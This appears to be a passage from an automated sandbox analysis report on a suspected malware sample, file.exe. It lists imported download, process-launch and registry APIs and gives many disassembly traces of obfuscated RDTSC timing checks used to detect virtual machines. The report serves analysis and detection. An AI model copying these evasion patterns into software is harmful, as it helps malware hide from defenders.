OTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2AEF4E second address: 2AEF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2AEF54 second address: 2AEF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424566 second address: 42456A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42456A second address: 42458A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F7E2CEC3D44h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424DA3 second address: 424DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7E2CEB1B25h 0x0000000b jmp 00007F7E2CEB1B25h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424DD3 second address: 424DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424DD7 second address: 424DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 428495 second address: 4284C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 75170F93h 0x0000000d mov edx, dword ptr [ebp+122D2C88h] 0x00000013 lea ebx, dword ptr [ebp+1244D0CCh] 0x00000019 sub dword ptr [ebp+122D1CC3h], ecx 0x0000001f add edi, dword ptr [ebp+122D2F5Ch] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4284C0 second address: 4284CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4284CB second address: 4284E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7E2CEC3D3Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4202E0 second address: 4202F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEB1B1Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 445FE9 second address: 446018 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEC3D3Bh 0x0000000b jmp 00007F7E2CEC3D48h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446018 second address: 446034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4461B4 second address: 4461BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4461BE second address: 4461F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F7E2CEB1B3Ah 0x0000000e jmp 00007F7E2CEB1B28h 0x00000013 jmp 00007F7E2CEB1B1Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4461F0 second address: 446202 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEC3D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446202 second address: 446206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4464D8 second address: 4464FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F7E2CEC3D45h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4464FB second address: 446507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446507 second address: 446520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D45h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446520 second address: 44653D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4466B3 second address: 4466C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jng 00007F7E2CEC3D42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4466C2 second address: 4466C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4467E3 second address: 4467E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4467E7 second address: 446806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C03 second address: 446C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a pop esi 0x0000000b jmp 00007F7E2CEC3D49h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C27 second address: 446C2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C2C second address: 446C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C39 second address: 446C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C3D second address: 446C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F7E2CEC3D4Bh 0x00000010 jmp 00007F7E2CEC3D43h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C62 second address: 446C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446C67 second address: 446C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEC3D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446E2C second address: 446E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446E34 second address: 446E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446E53 second address: 446E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D706 second address: 43D70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D70F second address: 43D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEB1B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D719 second address: 43D769 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F7E2CEC3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F7E2CEC3D36h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F7E2CEC3D48h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jmp 00007F7E2CEC3D3Dh 0x00000022 popad 0x00000023 js 00007F7E2CEC3D4Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F7E2CEC3D3Ah 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 414684 second address: 414688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447235 second address: 447245 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEC3D36h 0x00000008 jbe 00007F7E2CEC3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447245 second address: 44727F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CEB1B1Ch 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jbe 00007F7E2CEB1B29h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 ja 00007F7E2CEB1B16h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44727F second address: 44728A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44728A second address: 447290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447290 second address: 447294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447C23 second address: 447C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F7E2CEB1B3Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447C32 second address: 447C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447C36 second address: 447C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447D84 second address: 447D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D9EF second address: 44DA11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CEB1B25h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F7E2CEB1B16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44DA11 second address: 44DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 450007 second address: 45000D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45000D second address: 450012 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 450264 second address: 450276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F7E2CEB1B18h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 450276 second address: 450280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F7E2CEC3D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45473B second address: 45474D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453DCB second address: 453DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453DCF second address: 453DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453DD5 second address: 453E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F7E2CEC3D3Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453E04 second address: 453E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F7E2CEB1B16h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4569DF second address: 456A08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEC3D38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEC3D48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456A08 second address: 456A0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456A0E second address: 456A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456B13 second address: 456B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456CC4 second address: 456CE4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEC3D42h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456D98 second address: 456DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7E2CEB1B29h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456DBF second address: 456DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457438 second address: 457454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457454 second address: 45745A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45745A second address: 45745E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457543 second address: 457548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4577B5 second address: 4577E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEB1B26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4577E3 second address: 4577E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4578C0 second address: 4578C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457DE1 second address: 457DF7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F7E2CEC3D3Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457DF7 second address: 457DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457DFB second address: 457E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, bx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7E2CEC3D38h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 add esi, dword ptr [ebp+122D24A6h] 0x0000002f push 00000000h 0x00000031 mov si, EBF1h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457E44 second address: 457E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458749 second address: 458755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45861F second address: 458623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458755 second address: 4587C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F7E2CEC3D36h 0x0000000c jo 00007F7E2CEC3D36h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7E2CEC3D38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1E0Eh], eax 0x00000035 mov dword ptr [ebp+12478C95h], esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F7E2CEC3D38h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 push 00000000h 0x00000059 push ecx 0x0000005a pop esi 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 pop edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4587C8 second address: 4587CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458F13 second address: 458F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A1BF second address: 45A1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45AA89 second address: 45AA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B4E1 second address: 45B4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45C023 second address: 45C047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F7E2CEC3D3Ch 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45CCC6 second address: 45CCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b jmp 00007F7E2CEB1B29h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jo 00007F7E2CEB1B1Ch 0x00000019 jl 00007F7E2CEB1B16h 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46108C second address: 461092 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 461092 second address: 46109D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F7E2CEB1B16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46109D second address: 4610C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D38A3h], eax 0x0000000e push 00000000h 0x00000010 mov ebx, dword ptr [ebp+122D1D12h] 0x00000016 mov edi, dword ptr [ebp+1244B445h] 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D2E54h] 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
